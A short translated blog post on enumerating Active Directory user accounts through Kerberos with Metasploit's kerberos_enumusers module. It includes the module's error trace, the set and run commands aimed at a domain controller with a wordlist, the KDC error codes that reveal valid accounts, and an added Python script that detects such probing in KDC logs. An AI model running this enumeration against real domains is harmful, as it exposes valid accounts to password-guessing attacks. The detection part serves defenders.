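Domain user enumeration with msf uses the kerberos_enumusers module:
auxiliary/gather/kerberos_enumusers
There is a pitfall here, though: msf6 lists the user_file option as Required: NO, yet the module still fails with an error if you leave it unset.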
[-] Auxiliary failed: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::Kerberos)
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/metasploit/framework/login_scanner/base.rb:266:in `valid!'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/login_scanner/base.rb:194:in `scan!'
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/remote/kerberos/auth_brute.rb:57:in `attempt_kerberos_logins'
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:36:in `run'
[*] Auxiliary module execution completed
Set the following options and run the module:
set domain enginge.com
set rhosts 192.168.183.133
set user_file ~/user.txt
run
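The error codes for the three states are:
KDC_ERR_PREAUTH_REQUIRED - additional pre-authentication is required
KDC_ERR_CLIENT_REVOKED - the client's credentials have been revoked
KDC_ERR_C_PRINCIPAL_UNKNOWN - the client was not found in the Kerberos database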
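The same three error codes make this enumeration visible on the KDC side. The Python code below is an added example, not part of the original post or of Metasploit: it groups AS-REQ failures by source address and flags sources that probe many distinct names, most of which do not exist. The record format, addresses, account names and thresholds are constructed assumptions; the numeric values 6, 18 and 25 are the RFC 4120 codes for the three errors above.

```python
import csv
import io
from collections import defaultdict

# RFC 4120 numeric values of the three KRB-ERROR codes listed above.
PRINCIPAL_UNKNOWN = 6    # KDC_ERR_C_PRINCIPAL_UNKNOWN
CLIENT_REVOKED = 18      # KDC_ERR_CLIENT_REVOKED
PREAUTH_REQUIRED = 25    # KDC_ERR_PREAUTH_REQUIRED

# Constructed sample records (not real logs): time, source IP, principal, error code.
SAMPLE_LOG = """\
2023-09-21T09:58:10,192.168.183.20,alice,25
2023-09-21T09:59:42,192.168.183.21,bob,25
2023-09-21T10:00:01,192.168.183.50,admin,6
2023-09-21T10:00:01,192.168.183.50,administrator,25
2023-09-21T10:00:01,192.168.183.50,test,6
2023-09-21T10:00:02,192.168.183.50,guest,18
2023-09-21T10:00:02,192.168.183.50,backup,6
2023-09-21T10:00:02,192.168.183.50,svc_sql,6
2023-09-21T10:00:02,192.168.183.50,jdoe,25
"""

def find_enumeration_sources(log_text, min_names=5, min_unknown_ratio=0.5):
    """Return {source_ip: summary} for sources whose failures look like enumeration."""
    per_source = defaultdict(lambda: defaultdict(set))
    for row in csv.reader(io.StringIO(log_text)):
        if not row:
            continue  # tolerate blank lines in the export
        _ts, src, principal, code = row
        per_source[src][int(code)].add(principal.lower())
    findings = {}
    for src, by_code in per_source.items():
        names = set().union(*by_code.values())
        unknown = by_code.get(PRINCIPAL_UNKNOWN, set())
        # A normal logon yields one name per host and no "unknown" replies;
        # a wordlist run yields many names, a large share of them unknown.
        if len(names) >= min_names and len(unknown) / len(names) >= min_unknown_ratio:
            exposed = by_code.get(PREAUTH_REQUIRED, set()) | by_code.get(CLIENT_REVOKED, set())
            findings[src] = {
                "distinct_names": len(names),
                "unknown": len(unknown),
                # Accounts whose existence the source has now learned.
                "confirmed_existing": sorted(exposed),
            }
    return findings

if __name__ == "__main__":
    print(find_enumeration_sources(SAMPLE_LOG))
```

The confirmed_existing list shows which accounts the probing source has learned are valid, so those are the ones to watch for follow-on password guessing.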
Originally published on the WeChat official account (Enginge): Domain User Enumeration Attack